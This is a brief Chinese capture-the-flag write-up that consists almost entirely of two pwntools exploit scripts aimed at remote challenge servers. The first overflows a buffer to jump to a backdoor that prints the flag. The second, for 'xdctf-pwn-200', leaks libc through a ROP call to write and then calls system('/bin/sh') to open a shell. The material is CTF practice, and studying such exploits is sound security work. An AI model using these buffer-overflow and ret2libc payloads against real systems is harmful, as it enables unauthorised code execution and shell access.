有后门cat flag 直接在溢出后写入后门地址即可
from pwn import *
p = remote('111.200.241.244', 56567)
system = 0x80486cc
p.sendlineafter(b"> ", b'1')
p.sendlineafter(b"> ", b'0@0.'+ b'a'*28 + p32(system)*10)
print(p.recv())
p.interactive()
xdctf-pwn-200 也是直接可以写溢出返回地址,但没有后门,需要先泄露libc再写system(/bin/sh)
libc版本号从网上查
from pwn import *
p = remote('111.200.241.244',59261)
context(arch='i386', log_level='debug')
elf = ELF('./pwn')
payload = b'A'*(108+4) + flat(elf.plt['write'], 0x80483d0, 1, elf.got['write'], 4)
p.sendlineafter(b"Welcome to XDCTF2015~!\n", payload)
libc_base = u32(p.recv(4)) - 0x0d43c0
system = libc_base + 0x03a940
bin_sh = libc_base + 0x15902b
payload = b'A'*(108+4) + flat(system, 0x80483d0, bin_sh)
p.sendlineafter(b"Welcome to XDCTF2015~!\n", payload)
p.interactive()